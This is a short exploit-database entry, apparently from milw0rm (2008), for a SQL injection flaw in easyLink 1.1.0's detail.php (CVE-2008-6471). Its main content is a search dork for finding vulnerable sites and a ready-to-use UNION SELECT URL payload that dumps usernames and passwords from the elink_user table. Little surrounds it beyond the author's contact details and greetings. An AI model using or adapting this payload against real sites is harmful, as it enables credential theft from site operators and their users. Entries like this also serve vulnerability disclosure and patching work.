easyLink 1.1.0 - 'detail.php' SQL Injection



EKU-ID: 14376 CVE: OSVDB-48395;CVE-2008-6471 OSVDB-ID:
Author: Egypt Coder Published: 2008-09-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


================================================================================
easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
================================================================================



Discovered By: Egypt Coder

home : WWW.Sec-Area.com

Mail: Egyptcoder@hotmail.com



Dork: Engine powered by easyLink V1.1.0.



Exploit :


http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user


Greets  rUnViruS, Error Code, H666p , Fear Master , ProViDoR

# milw0rm.com [2008-09-19]